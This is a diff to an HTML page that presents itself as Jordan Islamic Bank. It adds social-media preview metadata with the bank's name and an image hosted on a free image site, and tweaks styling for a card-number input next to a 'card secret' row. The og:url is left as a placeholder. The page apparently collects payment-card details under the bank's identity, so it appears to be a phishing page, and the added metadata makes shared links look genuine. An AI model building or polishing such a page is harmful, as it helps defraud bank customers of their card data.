--- a/index.html
+++ b/index.html
@@ -4,6 +4,17 @@
     <meta charset="UTF-8">
     <title>البنك الإسلامي الأردني</title>
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <!-- Open Graph / Facebook -->
+    <meta property="og:title" content="البنك الإسلامي الأردني" />
+    <meta property="og:description" content="عضو مجموعة البركة" />
+    <meta property="og:image" content="https://www2.0zz0.com/2025/09/30/09/415897213.jpeg" />
+    <meta property="og:type" content="website" />
+    <meta property="og:url" content="https://your-site.com" />
+    <!-- Twitter Card -->
+    <meta name="twitter:card" content="summary_large_image" />
+    <meta name="twitter:title" content="البنك الإسلامي الأردني" />
+    <meta name="twitter:description" content="عضو مجموعة البركة" />
+    <meta name="twitter:image" content="https://www2.0zz0.com/2025/09/30/09/415897213.jpeg" />
     <style>
         @import url('https://fonts.googleapis.com/css2?family=Cairo:wght@700&display=swap');
         html, body {
@@ -227,7 +238,7 @@
         .card-num-input::-webkit-input-placeholder { text-align: center; }
         .card-num-input:-moz-placeholder { text-align: center; }
         .card-num-input::-moz-placeholder { text-align: center; }
-        .card-num-input:-ms-input-placeholder { text-align: center; }
+        .card-num-input::-ms-input-placeholder { text-align: center; }
         .card-secret-row {
             display: flex;
             justify-content: center;
